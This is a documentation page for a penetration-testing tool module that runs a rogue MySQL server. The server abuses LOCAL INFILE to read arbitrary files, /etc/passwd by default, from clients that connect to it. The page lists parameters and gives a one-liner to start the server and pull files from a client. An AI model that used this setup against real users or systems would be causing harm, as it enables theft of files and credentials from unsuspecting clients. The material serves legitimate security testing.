mysql.server (rogue)

A rogue MySQL server that can be used to exploit LOCAL INFILE and read arbitrary files from the client.

Commands

mysql.server on

Start mysql server.

mysql.server off

Stop mysql server.

Parameters

parameterdefaultdescription
mysql.server.infile/etc/passwdFile you want to read. UNC paths are also supported.
mysql.server.outfileIf filled, the INFILE buffer will be saved to this path instead of being logged.
mysql.server.address<interface address>Address to bind the mysql server to.
mysql.server.port3306Port to bind the mysql server to.
mysql.server.outfileIf filled, the INFILE buffer will be saved to this path instead of being logged.

Examples

One liner to start the server and steal /etc/passwd from clients connecting to your Rogue MySQL server

  1. $ sudo bettercap -eval "set mysql.server.infile /etc/hosts; mysql.server on"

Now connect to your MySQL server and observe the file output on the Bettercap terminal

  1. $ mysql -u root -h 192.168.1.123 -pasdsasad --enable-local-infile